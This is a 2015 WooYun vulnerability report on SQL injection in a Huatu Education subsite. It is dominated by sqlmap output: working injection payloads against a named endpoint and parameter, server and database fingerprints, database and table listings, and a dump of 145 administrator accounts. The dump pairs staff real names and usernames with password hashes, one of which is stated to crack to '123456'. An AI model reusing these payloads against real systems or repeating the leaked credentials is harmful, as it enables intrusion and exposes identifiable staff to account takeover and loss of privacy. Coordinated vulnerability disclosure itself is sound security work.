当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123492

漏洞标题:华图教育某分站SQL注射(涉及多个数据库)

相关厂商:华图教育

漏洞作者: 路人甲

提交时间:2015-06-29 16:41

修复时间:2015-08-14 10:58

公开时间:2015-08-14 10:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-30: 厂商已经确认,细节仅向厂商公开
2015-07-10: 细节向核心白帽子及相关领域专家公开
2015-07-20: 细节向普通白帽子公开
2015-07-30: 细节向实习白帽子公开
2015-08-14: 细节向公众公开

简要描述:

RT(补充数据证明)

详细说明:

基于时间的盲注,涉及多个数据库,多个弱口令密码

49ba59abbe56e057(123456)


sql注入点

http://1dui1.huatu.com/ydyzs.php 
post参数 tag=1&title=54O5b8On 
title参数存在基于时间的盲注


huatu.jpg

漏洞证明:

sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tag=1&title=';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: tag=1&title=' WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
current user:    'develop'
current database:    'HTOLMain'
current user is DBA:    False
available databases [11]:
[*] HTOL_Card
[*] HTOL_DaSai
[*] HTOL_Study
[*] HTOLMain
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tag=1&title=';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: tag=1&title=' WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
Database: HTOLMain
[248 tables]
+------------------------------+
| 360cps                       |
| 360cps_copy                  |
| AliPay_Cash_Log              |
| Branch_School                |
| Card_Msyy                    |
| ChunJie_YouhuiInfo           |
| Cl_Admin                     |
| Cl_Ads                       |
| Cl_Announce                  |
| Cl_Article                   |
| Cl_BankrollItem              |
| Cl_CardFree                  |
| Cl_CardFreeNum               |
| Cl_Channel                   |
| Cl_Class                     |
| Cl_Comment                   |
| Cl_ConsumeLog                |
| Cl_Course_Price              |
| Cl_CreateFiles               |
| Cl_DeliverItem               |
| Cl_DeliverType               |
| Cl_Favorite                  |
| Cl_Friend                    |
| Cl_Guest                     |
| Cl_Js                        |
| Cl_Keyword                   |
| Cl_Label                     |
| Cl_LinkClass                 |
| Cl_LinkConfig                |
| Cl_LinkSite                  |
| Cl_MKCard                    |
| Cl_Message                   |
| Cl_Movie                     |
| Cl_NoDownLoad                |
| Cl_Order                     |
| Cl_OrderItem                 |
| Cl_OrderItem_History         |
| Cl_Order_History             |
| Cl_Page                      |
| Cl_PageItem                  |
| Cl_PassIP                    |
| Cl_Payment                   |
| Cl_Photo                     |
| Cl_Plus                      |
| Cl_Product                   |
| Cl_Server                    |
| Cl_Setup                     |
| Cl_Soft                      |
| Cl_Special                   |
| Cl_Student_Schedule          |
| Cl_Style                     |
| Cl_StyleHelp                 |
| Cl_UpFileLog                 |
| Cl_User                      |
| Cl_UserCz                    |
| Cl_UserCz_Used               |
| Cl_UserGroup                 |
| Cl_User_Ext                  |
| Cl_User_Unactive             |
| Cl_Vote                      |
| Cl_acclog                    |
| Cl_tylog                     |
| ClassHandOut                 |
| Complaint                    |
| CunGuanClasses               |
| DV_IP                        |
| EventLog                     |
| FreeCard_ConsumeLog          |
| HTTC_Cl_Order                |
| HTTC_Cl_OrderItem            |
| JCZFClasses                  |
| JiFen_Log                    |
| JunClasses                   |
| LearnAnswers                 |
| LearnClassNotes              |
| LearnQuestions               |
| LearnStatInfo                |
| LearningClasses              |
| LearningLog                  |
| MianShiClasses               |
| MianShi_AppointmentInfo      |
| MianShi_StudentInfo          |
| MonthOrderCourse             |
| NetClassCategory             |
| NetClassFeedBack             |
| NetClassLogic                |
| NetClassSubjects             |
| NetClassSuit                 |
| NetClassTypes                |
| NetClass_Assignment_Relation |
| NetClass_Assignments         |
| NetClass_Download_Relation   |
| NetClass_Downloads           |
| NetClass_HomeWork            |
| NetClass_Learn_Log           |
| NetClass_Notice              |
| NetClass_Notice_Relation     |
| NetClasses                   |
| NetClasses_Treaty            |
| NetClasses_ZengSong          |
| NetLession_Learn_Log         |
| NetLession_Rate_Log          |
| NetLessions                  |
| NormalClasses                |
| Order_ext                    |
| Privilage_Info               |
| PromoCode                    |
| Province                     |
| Role_Info                    |
| Role_Privilage               |
| RoomCourse                   |
| SNS_Blog                     |
| SNS_Blog_Category            |
| SNS_Blog_Comment             |
| SNS_Friends                  |
| SNS_Friends_Invite           |
| SNS_Friends_Type             |
| SNS_Friends_Visit_Log        |
| SNS_Message_LastView         |
| SNS_NewsFeed                 |
| SNS_User_CareerInfo          |
| SNS_User_Contact             |
| SNS_User_Education           |
| SNS_User_LiuYan              |
| SNS_User_LiuYan_Reply        |
| SNS_User_Private_Settings    |
| SNS_User_StatusText          |
| SNS_Vote                     |
| SNS_Vote_Result              |
| SNS_Vote_Revote              |
| SNS_Vote_Sub                 |
| ScheduleDetail               |
| SheGongClasses               |
| ShiYeClasses                 |
| Shumaban_Card                |
| Shumaban_LearnQuestions      |
| TeacherSubjects              |
| Teacher_Rate_Log             |
| Teachers                     |
| TiYanCard_Info               |
| TiYanClasses                 |
| TrialClasses                 |
| Unactive_User_Classes        |
| UnionApply                   |
| UnionInfo                    |
| Union_AgentFee               |
| Union_News                   |
| User_ConsumeLog              |
| User_QH_log                  |
| XDTrialClasses               |
| XH_Config                    |
| XH_IP                        |
| XH_Question                  |
| XH_Subject                   |
| XH_Title                     |
| XH_UserInfo                  |
| XiangZhenClasses             |
| XuanDiaoClasses              |
| ZhaoJingClasses              |
| activelink                   |
| bishi_StudentInfo            |
| city                         |
| cl_list                      |
| cl_newpermissions            |
| classBanbie                  |
| classPhase                   |
| classTable                   |
| classTixi                    |
| classTpl                     |
| classVer                     |
| classView                    |
| comment                      |
| digitalArea                  |
| digitalClass                 |
| digital_replyRate            |
| drm_ip                       |
| dtproperties                 |
| emailLog                     |
| freecard_order_relation      |
| generateCourseRecord         |
| helpCenter                   |
| helpType                     |
| hteacher_userunion           |
| indexHot                     |
| indexNew                     |
| indexRebao                   |
| jiangyiimg                   |
| jsName                       |
| jsSize                       |
| knowledge_point              |
| learn_activity_list          |
| lession_rate                 |
| lession_studyresult          |
| lesson_vote                  |
| libyc_usertbinfo             |
| libyc_usertbspaceused        |
| merchant                     |
| mkClass                      |
| monthCardUser                |
| monthOrder                   |
| monthOrderRemark             |
| netclassext                  |
| netclassexttype              |
| noteType                     |
| oldUserDiscount              |
| orderextent                  |
| poll                         |
| promary                      |
| puzi_Recommend               |
| puzi_subject                 |
| qpx_userInfo                 |
| recommendUnion               |
| registerInfo                 |
| replyRate                    |
| shumaban_LearnAnswers        |
| studentNote                  |
| studentNoteReply             |
| sysconstraints               |
| syssegments                  |
| teaUser_ConsumeLog           |
| teachers_vote                |
| teauserunionad               |
| tem10sgkNote                 |
| temBless                     |
| temGkNote                    |
| temGqNote                    |
| temWy                        |
| temZb                        |
| tmp_userArea                 |
| tmptyk                       |
| unionAd                      |
| unionAdVisit                 |
| unionFocusImg                |
| unionNote                    |
| unionNoteReply               |
| unionRegInfo                 |
| unionRequest                 |
| unionType                    |
| userunion                    |
| userunion_fankuan            |
| userunionad                  |
| xieyiedit                    |
| yeepay_cash_log              |
| yiqifa                       |
| htol.choujiangKU             |
| htol.choujiangMD             |
| htol.choujiangMD2            |
| htol.userunionsalary         |
+------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tag=1&title=';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: tag=1&title=' WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
Database: HTOLMain
Table: Cl_Admin
[16 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| AddUser        | nvarchar |
| arrClassCheck  | ntext    |
| arrClassInput  | ntext    |
| arrClassMaster | ntext    |
| department     | nvarchar |
| flag           | tinyint  |
| ID             | int      |
| LastLoginIP    | nvarchar |
| LastLoginTime  | datetime |
| LastLogoutTime | datetime |
| LoginTimes     | int      |
| Password       | nvarchar |
| Purview        | ntext    |
| Purview_Other  | ntext    |
| realname       | nvarchar |
| UserName       | nvarchar |
+----------------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tag=1&title=';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: tag=1&title=' WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
Database: HTOLMain
Table: Cl_Admin
[145 entries]
+------------------+------------------+----------+
| UserName         | Password         | realname |
+------------------+------------------+----------+
| cxhtest          | 7202ac6ae9a9a751 | 蔡晓辉      |
| htjy408          | 7545ba2e1ac45b39 | 蔡淝田      |
| htwx080          | 961b2b3b5f14c1bb | 孙旭光      |
| htwx0742         | ffc38b3b0bb15c5c | 靳畅       |
| htyangjie        | e34f92d36b069a6a | 杨杰       |
| htjyl0127        | 1cef9c26aa67ab58 | 王铁红      |
| htwx0635         | 0c65d5ec81707084 | 王玲       |
| htjyl1093        | 5fe9db73ac365a6c | 魏本见      |
| htwxsx291        | 37e941b4aa8f39ad | 徐小妹      |
| fjwfjw           | 8d4dd7ba0c3c72bf | 傅建文      |
| htjy0591         | 5f8326b142088fec | 李凯       |
| htjyl084         | 81b4398d68735568 | 刘真宗      |
| xinglily         | 9fa2f7ec34ff3f07 | 省丽丽      |
| zhangdejiang     | 8654796b618b18da | 张德江      |
| htwxzb080        | d551ec92912f3989 | 张梦元      |
| htjy0974         | c3ca81eac41938c0 | 韩利亚      |
| htwx1648         | 7c387f21a5801303 | 王红飞      |
| htjy3860         | 7c1040524eb576b6 | 张宏宇      |
| huatu1772        | 334c07e86695b1aa | 李娇       |
| huangjinxia      | 9b2c3c191bfbd273 | 黄金霞      |
| htwx4112         | 0c546befd4151682 | 韦柳       |
| htwxl004         | dae943e903dd210f | 刘洪燕      |
| htwxl007         | 22cd38918ec095b1 | 李文龙      |
| htjy4233         | 98bd35d284dae6af | 白秋冰      |
| liuyuting929     | 6c101ea1b54f2de4 | 刘玉婷      |
| huatu4935        | 28654f37c99225bd | 赵仿       |
| htjy1987         | b9f53508d38ed8ca | 郭元双      |
| 肺儿vivv           | 8747df9ea382e353 | 杨雯       |
| htjy5818         | 5cd861ba6dee8ff1 | 徐利国      |
| qinzhimin秦志敏     | 49ba59abbe56e057 | 秦志敏      |
| htxinghua        | b78d7e71ac5514e5 | 邢华       |
| htjy6188         | e528df012027aedf | 张海亮      |
| 李品友              | 310368c3ded5e492 | 李品友      |
| dongpeirong      | e528df012027aedf | 董培荣      |
| htwx6349         | 3b31dd1b2fef8895 | 何斌       |
| tencent          | 63202bfd738a9df2 | 郭勇       |
| louwaixian       | 7a3e6346b0439fb2 | 李园       |
| htjy7218         | 23c3a03d20b7b660 | 朱坤月      |
| htcaijinlong     | 295447b4c8419e7d | 蔡金龙      |
| gaoshuang1018    | 93214a1202fe4170 | 郜爽       |
| htjy7514         | ccff059415805dcc | 王红丽      |
| htwxzb078        | fe704367e11653ea | 周为       |
| htzhaojing1987   | 49ba59abbe56e057 | 赵晶       |
| dupengliang2008  | 49ba59abbe56e057 | 杜鹏亮      |
| htmalan          | 49ba59abbe56e057 | 马兰       |
| htguolei         | 6c6da156be4d0a77 | 郭磊       |
| htjy6684         | 6e6f7bae26bd4046 | 李慧       |
| htjyl081         | 217daa75b32ab47d | 曹丁月      |
| htjs2101         | e2cddf8d44ddb24d | 王利科      |
| htjy3785         | ad77bdfecf2c404c | 孙亚非      |
| zhaojiaody       | 8c090a14e428d774 | 招教答疑账号   |
| htwxsh-liuyan    | 49ba59abbe56e057 | 刘妍       |
| 2013dbmsd        | 49ba59abbe56e057 | 山东分校     |
| 2013dbmbj        | 49ba59abbe56e057 | 北京分校     |
| 2013dbmgd        | e528df012027aedf | 广东分校     |
| 2013dbmsz        | 49ba59abbe56e057 | 深圳分校     |
| 2013dbmqd        | 49ba59abbe56e057 | 青岛分校     |
| 2013dbmjs        | 49ba59abbe56e057 | 江苏分校     |
| 2013dbmln        | 3f9537b4d4d5d56f | 辽宁分校     |
| 2013dbmjx        | 49ba59abbe56e057 | 江西分校     |
| 2013dbmyn        | 49ba59abbe56e057 | 云南分校     |
| 2013dbmzj        | 49ba59abbe56e057 | 浙江分校     |
| 2013dbmah        | 49ba59abbe56e057 | 安徽分校     |
| 2013dbmwh        | 6590cd208b8f4de1 | 芜湖分校     |
| 2013dbmhn        | 49ba59abbe56e057 | 河南分校     |
| 2013dbmhb        | 49ba59abbe56e057 | 河北分校     |
| 2013dbmhub       | 49ba59abbe56e057 | 湖北分校     |
| 2013dbmyc        | 49ba59abbe56e057 | 宜昌分校     |
| 2013dbmhun       | 49ba59abbe56e057 | 湖南分校     |
| 2013dbmsy        | 49ba59abbe56e057 | 邵阳分校     |
| 2013dbmnmg       | 49ba59abbe56e057 | 内蒙古分校    |
| 2013dbmhlbe      | 49ba59abbe56e057 | 呼伦贝尔分校   |
| 2013dbmsx        | 49ba59abbe56e057 | 山西分校     |
| 2013dbmcc        | bd240168bf189c9d | 吉林长春分校   |
| 2013dbmshx       | 49ba59abbe56e057 | 陕西分校     |
| 2013dbmgx        | 49ba59abbe56e057 | 广西分校     |
| 2013dbmgz        | 49ba59abbe56e057 | 贵州分校     |
| 2013dbmxj        | 49ba59abbe56e057 | 新疆分校     |
| 2013dbmsc        | dbd5c91e1ce150d8 | 四川分校     |
| 2013dbmtj        | 49ba59abbe56e057 | 天津分校     |
| 2013dbmfj        | 49ba59abbe56e057 | 福建分校     |
| 2013dbmxm        | 49ba59abbe56e057 | 厦门分校     |
| 2013dbmhain      | 49ba59abbe56e057 | 海南分校     |
| 2013dbmcq        | 49ba59abbe56e057 | 重庆分校     |
| 2013dbmnx        | 49ba59abbe56e057 | 宁夏分校     |
| 2013dbmgs        | ed093d23e4b4f666 | 甘肃分校     |
| 2013dbmqh        | 49ba59abbe56e057 | 青海分校     |
| 2013dbmxz        | 49ba59abbe56e057 | 西藏分校     |
| 2013dbmhlj       | 49ba59abbe56e057 | 黑龙江分校    |
| 2013dbmjl        | 49ba59abbe56e057 | 吉林市分校    |
| 2014dbmdl        | 49ba59abbe56e057 | 大连分校     |
| htwxjianglu      | 6d86bb70aebaea5f | 姜璐       |
| htwxhtshenjiting | 49ba59abbe56e057 | 沈及廷      |
| htwxzhangjian    | e91ded229ba29284 | 张建       |
| htwxzhouwen      | 2b08341d15348645 | 周文       |
| 2014dbmly        | 49ba59abbe56e057 | 临沂分校     |
| htwxhtliutao     | 2536bb275e3fb8d2 | 刘涛       |
| htwxchangxuan    | 62f042d1857c66dd | 常轩       |
| htwxyangxiu      | 14e1f06d68c5b339 | 杨秀       |
| htjy5679         | 49ba59abbe56e057 | 胡浩       |
| htwxzhaohy       | 49ba59abbe56e057 | 赵环宇      |
| htwxlixiaofeng   | 62a29f5731354b1c | 李晓凤      |
| htwxwxlibo       | 49ba59abbe56e057 | 李博       |
| htwxchengyongle  | 49ba59abbe56e057 | 程永乐      |
| htwxhujp         | 227c0381976beea4 | 胡锦平      |
| htwxzhoujl       | 49ba59abbe56e057 | 周江龙      |
| htwxhubo         | 49ba59abbe56e057 | 胡泊       |
| htwxwxlining     | 49ba59abbe56e057 | 李宁       |
| htwxleijie       | 49ba59abbe56e057 | 雷婕       |
| htwxpeihf        | b8e9597221dfad60 | 裴红粉      |
| htwxxiaotf       | be578a5caf991d18 | 肖腾飞      |
| htwxwangmeijuan  | 49ba59abbe56e057 | 王美娟      |
| htjy_010383      | 4b1326c98617f689 | 郭玉康      |
| htwxxiehuayun    | f8ed4f05b7db9151 | 谢化云      |
| htwxcuixz        | 227be011b9732c58 | 崔显志      |
| htwxzhaoyong     | b2bf2966ef482595 | 赵勇       |
| htwxzhanghq      | 49ba59abbe56e057 | 张海琦      |
| htwxzhangfan     | cfc146b448ef26af | 张帆       |
| htwxwxlifei      | 445bb47b60cf5f54 | 李飞       |
| htwxzhangel      | 49ba59abbe56e057 | 张二龙      |
| 2015dbmnb        | 49ba59abbe56e057 | 山东分校     |
| htwxxiege        | 49ba59abbe56e057 | 谢舸       |
| htwxhouxq        | 3d58cd1769c6e676 | 侯鑫琴      |
| htwxbiwei        | 83449dde8972df86 | 毕炜       |
| htwxxuxf         | 49ba59abbe56e057 | 许晓霏      |
| htwxhtyuexin     | fbeaed20868fe492 | 岳鑫       |
| htwxwxliulu      | 49ba59abbe56e057 | 刘陆       |
| htwxwxlishuai    | 341192aeeabe54b3 | 李帅       |
| weibj666         | 5fe9db73ac365a6c | 魏本见      |
| htwxfengyun      | a230e17badc194ab | 冯云       |
| htwxxiongying    | c384aa278ff8bbcd | 熊瑛       |
| htwxgaoyu        | 737559f4aae9a82f | 高宇       |
| htwxtianzy       | 49ba59abbe56e057 | 田志英      |
| htwxdengcj       | 49ba59abbe56e057 | 邓昌菊      |
| 2013dbmbj_gk     | 49ba59abbe56e057 | 王宇航      |
| htwxcaidong      | 83aa400af464c76d | 蔡冬       |
| htwxlinjq        | aad782eb7517c8de | 林佳岐      |
| htjylzy          | c26304613465603f | 刘振宇      |
| htwxxiongqy      | 136b2c50a043fe12 | 熊其焰      |
| htwxl691         | 8b1da629ee274cd5 | 申甲子      |
| htwxfull         | c26304613465603f | 付莉莉      |
| htwx_4043555     | 97a7757b9e175580 | 王凌燕      |
| htzhoushenghan   | c26304613465603f | 周圣涵      |
| htwxluoxm        | 0f6fb996e6ee84df | 骆晓明      |
| app_5503c448     | c26304613465603f | 张蕾       |
+------------------+------------------+----------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-30 10:57

厂商回复:

正在处理,谢谢

最新状态:

暂无

漏洞评价:

评论